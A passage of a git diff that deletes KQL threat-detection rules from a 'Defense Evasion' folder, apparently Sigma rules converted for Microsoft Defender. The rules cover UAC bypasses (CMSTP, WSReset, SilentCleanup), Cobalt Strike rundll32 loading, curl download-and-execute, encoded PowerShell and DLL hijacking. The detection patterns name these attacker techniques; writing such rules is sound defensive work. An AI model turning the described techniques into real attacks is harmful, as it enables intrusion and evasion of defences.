-E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
-One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
-
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))) and (not((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall --channel=stable" and (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql b/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql
deleted file mode 100644
index 91362173..00000000
--- a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/29
-// Level: high
-// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
-// Tags: attack.t1027, attack.defense_evasion, attack.t1140, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
deleted file mode 100644
index 75e530fc..00000000
--- a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024/01/02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Blackbyte_Ransomware_Registry.kql b/Defense Evasion/Blackbyte_Ransomware_Registry.kql
deleted file mode 100644
index c3f67c1d..00000000
--- a/Defense Evasion/Blackbyte_Ransomware_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/24
-// Level: high
-// Description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql b/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql b/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_CMSTP.kql b/Defense Evasion/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Defense Evasion/Bypass_UAC_via_CMSTP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql b/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql b/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql
deleted file mode 100644
index 72baadb5..00000000
--- a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/07
-// Level: medium
-// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Process_Creation.kql b/Defense Evasion/CMSTP_Execution_Process_Creation.kql
deleted file mode 100644
index 32254f8e..00000000
--- a/Defense Evasion/CMSTP_Execution_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Registry_Event.kql b/Defense Evasion/CMSTP_Execution_Registry_Event.kql
deleted file mode 100644
index fc5cd431..00000000
--- a/Defense Evasion/CMSTP_Execution_Registry_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql b/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql
deleted file mode 100644
index a079b713..00000000
--- a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
-This utility can be abused in order to run custom COM object created in the registry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe")) or ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (not((FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql b/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql
deleted file mode 100644
index 8a079db6..00000000
--- a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql b/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql
deleted file mode 100644
index ba7ae505..00000000
--- a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql b/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql
deleted file mode 100644
index 948e8aaf..00000000
--- a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/17
-// Level: high
-// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Change_the_Fax_Dll.kql b/Defense Evasion/Change_the_Fax_Dll.kql
deleted file mode 100644
index f42ea9fd..00000000
--- a/Defense Evasion/Change_the_Fax_Dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect possible persistence using Fax DLL load when service restart
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql b/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql
deleted file mode 100644
index 37d93606..00000000
--- a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "Enabled" and RegistryKey contains "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql b/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql
deleted file mode 100644
index fe5a03e5..00000000
--- a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/01
-// Level: high
-// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql b/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql
deleted file mode 100644
index fe701214..00000000
--- a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/01/17
-// Level: medium
-// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
-This behavior has been used by threat actors behind Dharma ransomware.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql b/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql
deleted file mode 100644
index c597db84..00000000
--- a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Control_Panel_Items.kql b/Defense Evasion/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Defense Evasion/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
deleted file mode 100644
index 1f4c9f72..00000000
--- a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/CreateDump_Process_Dump.kql b/Defense Evasion/CreateDump_Process_Dump.kql
deleted file mode 100644
index d2af686e..00000000
--- a/Defense Evasion/CreateDump_Process_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql b/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql
deleted file mode 100644
index ef6299fb..00000000
--- a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql b/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
deleted file mode 100644
index 544ae6eb..00000000
--- a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/02/11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
-DeviceProcessEvents
-| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains 
":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Defense Evasion/Curl_Download_And_Execute_Combination.kql b/Defense Evasion/Curl_Download_And_Execute_Combination.kql
deleted file mode 100644
index a0dd325c..00000000
--- a/Defense Evasion/Curl_Download_And_Execute_Combination.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/01/13
-// Level: high
-// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")
\ No newline at end of file
diff --git a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql b/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql
deleted file mode 100644
index 40bbb2ff..00000000
--- a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_R0M_
-// Date: 2022/06/11
-// Level: high
-// Description: Detects the abuse of custom file open handler, executing powershell
-// Tags: attack.defense_evasion, attack.t1202
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey contains "shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/DHCP_Callout_DLL_Installation.kql b/Defense Evasion/DHCP_Callout_DLL_Installation.kql
deleted file mode 100644
index 67ddb9cc..00000000
--- a/Defense Evasion/DHCP_Callout_DLL_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dimitrios Slamaris
-// Date: 2017/05/15
-// Level: high
